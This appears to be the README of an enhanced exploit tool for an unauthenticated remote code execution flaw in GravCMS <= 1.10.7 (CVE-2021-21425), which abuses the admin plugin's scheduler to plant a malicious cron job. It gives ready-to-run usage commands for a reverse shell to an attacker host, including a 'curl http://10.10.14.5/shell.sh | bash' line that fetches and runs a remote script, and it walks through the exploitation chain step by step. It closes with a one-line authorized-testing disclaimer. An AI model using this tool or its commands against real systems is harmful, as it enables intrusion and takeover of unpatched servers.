Unauthenticated Remote Code Execution exploit for GravCMS <= 1.10.7 via arbitrary YAML write to the scheduler.
This is an improved version of EDB-49973. The original exploit requires manual editing of hardcoded values in the script. This version adds proper CLI arguments and automatic base64 encoding of payloads.
Improvements over original:
- Command-line arguments for target, LHOST, LPORT
- Automatic base64 encoding of reverse shell payload
- Custom command support (
-c) - Proper error handling and status output
| Field | Value |
|---|---|
| CVE | CVE-2021-21425 |
| EDB-ID | 49973 |
| Affected | GravCMS <= 1.10.7 |
| Type | Unauthenticated RCE |
| CVSS | 9.8 (Critical) |
The Grav Admin plugin fails to verify authentication on certain admin routes, allowing unauthenticated users to write arbitrary YAML configuration. This exploit abuses the scheduler configuration to create a cron job that executes arbitrary PHP code.
# Reverse shell
python3 exploit.py -t http://target -s <LHOST> <LPORT>
# Custom command
python3 exploit.py -t http://target -c "id"# Get reverse shell on target
python3 exploit.py -t http://10.10.10.5 -s 10.10.14.5 4444
# Execute command
python3 exploit.py -t http://grav.local:8080 -c "curl http://10.10.14.5/shell.sh | bash"pip install requests- Fetches
/adminto extract theadmin-noncetoken (no auth required due to vulnerability) - Sends POST to
/admin/config/schedulerwith malicious cron job configuration - Scheduler executes PHP payload via
/usr/bin/php -r eval(base64_decode(...)) - PHP writes base64-decoded reverse shell to
/tmp/rev.shand executes it
The cron job runs every minute (* * * * *), so shell arrives within 60 seconds.
- 2021-03-29 - Disclosed by Mehmet Ince
- 2021-04-01 - Patched in Grav Admin Plugin
For authorized security testing only. Ensure you have written permission before testing against any system.
